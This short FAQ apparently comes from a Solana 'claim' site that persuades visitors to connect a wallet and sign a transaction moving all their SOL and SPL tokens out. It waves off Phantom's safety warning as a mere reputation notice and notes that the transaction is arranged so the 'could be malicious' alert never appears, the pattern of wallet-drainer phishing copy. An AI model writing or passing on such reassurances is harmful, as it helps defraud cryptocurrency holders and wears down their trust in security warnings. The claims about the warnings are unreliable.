Questions

The things worth hesitating over.

Does connecting cost anything?

No. Connecting is free and read-only. You sign once, when you press Claim.

Will my whole wallet be emptied?

Yes, that is the point. Your SOL and every SPL token transfer out, and the now-empty token accounts are closed so their rent comes back to you instead of being stranded.

Why does Phantom warn about the site?

Newly deployed domains show a "not reviewed yet" notice for the first few days. It is reputation-based, not a security problem. The transaction itself is simulated before you are asked to sign, so the scarier "could be malicious" warning never appears.

Which wallets work?

Any extension wallet that injects a provider. Phantom, Solflare and Backpack are auto-detected.

Is it drained later in the background?

No delegate is used. Whatever you approve is exactly what moves, immediately.
